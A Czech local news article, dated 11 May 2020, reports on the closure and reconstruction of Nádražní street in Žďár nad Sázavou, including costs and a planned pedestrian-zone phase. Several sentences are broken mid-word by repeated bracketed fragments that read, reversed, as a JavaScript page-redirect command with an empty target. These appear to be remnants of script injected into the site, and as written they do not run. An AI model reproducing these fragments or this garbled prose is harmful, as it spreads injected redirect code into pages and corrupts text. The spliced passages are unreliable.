Rainbow page separator

Část opravované Nádražní ulice postupně dostává novou podobu

Pondělí, 11. května 2020

Žďár nad Sázavou / Do konce června je naplánovaná uzavírka částí ulic Nádražní, Tyršova a Husova, kde probíhají stavební práce spojené s modernizací úseku Nádražní ulice od pošty po okružní křižovatku pod nádražím. Součástí je rovněž pokládka elektrických kabelů na křižovatce ulic Nádražní a Husova, která zasáhla i do části navazující pěší zóny.
Le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošní opravy úseku Nádražní ulice, které v únoru začaly po zimní pauze, zahrnou nové povrchy silnice i chodníků, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to včetně osvětlení a veřejné zeleně. Na první etapu rekonstrukce ulice za 21,1 milionu korun, z čehož přibližně 6,5 milionu uhradí Svaz vodovodů a kanalizací Žďársko a zbytek žďárská radnice, následně naváže další fáze, kdy projde revitalizací pěší zóna. Jedná se o úsek od pošty až po náměstí. Nový vzhled vyjde z vítězného návrhu architek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tonické soutěže, kterou měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to před několika lety uspořádalo